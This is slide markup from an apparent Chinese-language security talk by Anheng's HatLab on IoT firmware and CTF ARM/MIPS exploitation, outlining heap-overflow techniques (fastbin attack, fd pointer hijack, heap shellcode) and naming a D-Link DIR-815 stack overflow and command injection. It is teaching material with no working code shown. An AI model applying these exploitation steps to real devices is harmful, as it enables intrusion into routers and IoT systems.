              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>值置为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8+1</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free(chunk2)</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zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>再次利用堆溢出将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>控制在某个精心构造的大小</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free(chunk2)</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jmp heap address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（需要提前布置好堆上的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解题步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>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MIPS PWN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GDB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>堆调试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="64770" y="2033905"/>
            <a:ext cx="4993640" cy="2803525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3780155" y="1058545"/>
            <a:ext cx="4286250" cy="428625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3461385" y="1637030"/>
            <a:ext cx="4923790" cy="294640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4386580" y="1744345"/>
            <a:ext cx="852170" cy="18732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168900" y="1289050"/>
            <a:ext cx="1009650" cy="18732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ARM PWN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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fastbin attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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堆管理机制类似 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MIPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指令集架构</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攻击方式与 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>相同</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496310" y="1186180"/>
            <a:ext cx="5567045" cy="21513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ARM PWN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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漏洞点</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数存在堆溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4007485" y="1637030"/>
            <a:ext cx="5036185" cy="2891790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603192" y="2914235"/>
            <a:ext cx="4215130" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>堆溢出的几种利用方式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="3534410"/>
            <a:ext cx="7108825" cy="92202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fastbin attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（        ）</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unlink</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chunk overlapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1937385" y="3586480"/>
            <a:ext cx="323215" cy="323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ARM PWN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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But?</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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fd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指针不是对齐的</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uClibc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>机制？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="395605" y="2739390"/>
            <a:ext cx="7684135" cy="19989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ARM PWN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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对比 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>libuClibc.so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>代码和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>free.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>源码 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770255" y="2007235"/>
            <a:ext cx="7115175" cy="28301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603192" y="725907"/>
            <a:ext cx="4215130" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARM PWN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>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解题步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="7108825" cy="1476375"/>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构造 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>heap overlapping</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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泄露堆地址，并计算基地址</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控制 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指针，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>劫持到存储函数指针的堆块上</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修改函数指针为堆地址</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跳转到堆上执行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2722880" y="3174365"/>
            <a:ext cx="6407150" cy="16852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固件中常见安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1756410"/>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栈溢出是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设备固件中非常常见的一类的漏洞，当溢出的长度足以控制栈上的返回地址时，很容易造成任意代码执行的风险。</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固件安全漏洞之栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4210050" y="2218055"/>
            <a:ext cx="4754245" cy="2556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安恒研究院</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>海特实验室</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1945005"/>
            <a:ext cx="5825490" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>海特实验室（HatLab），寓意为 “Hack AnyThing”，是安恒信息安全研究院成立的一支致力于 IOT 安全研究的团队</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。专注于物联网硬件、固件、无线电相关安全研究。先后发现 Cisco、Juniper、PaloAlto、TP-LINK、GoAhead、Lua 等知名厂商与相关通用 IOT 组件的漏洞。参与 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BlackHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、HITB、ZeroNights、GeekPwn、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>强网杯</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>等国内外知名会议和演讲，并自主研发多个创新性硬件设备。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="5e6ae34ea59cb"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5329555" y="3232785"/>
            <a:ext cx="3702050" cy="157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固件中常见安全漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603250" y="1756410"/>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DLINK DIR-815 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>路由器前台栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200"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固件安全漏洞之栈溢出</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>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371475" y="2643505"/>
            <a:ext cx="8401050" cy="19646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3279" y="2710434"/>
            <a:ext cx="6687750" cy="1850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固件中常见安全漏洞</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>固件安全漏洞之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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命令注入在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IOT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>设备固件同样非常普遍，且利用简单，注入点通常运行的服务都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A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固件中常见安全漏洞</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>固件安全漏洞之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1F2A66"/>
                </a:solidFill>
              </a:rPr>
              <a:t>命令注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1F2A66"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
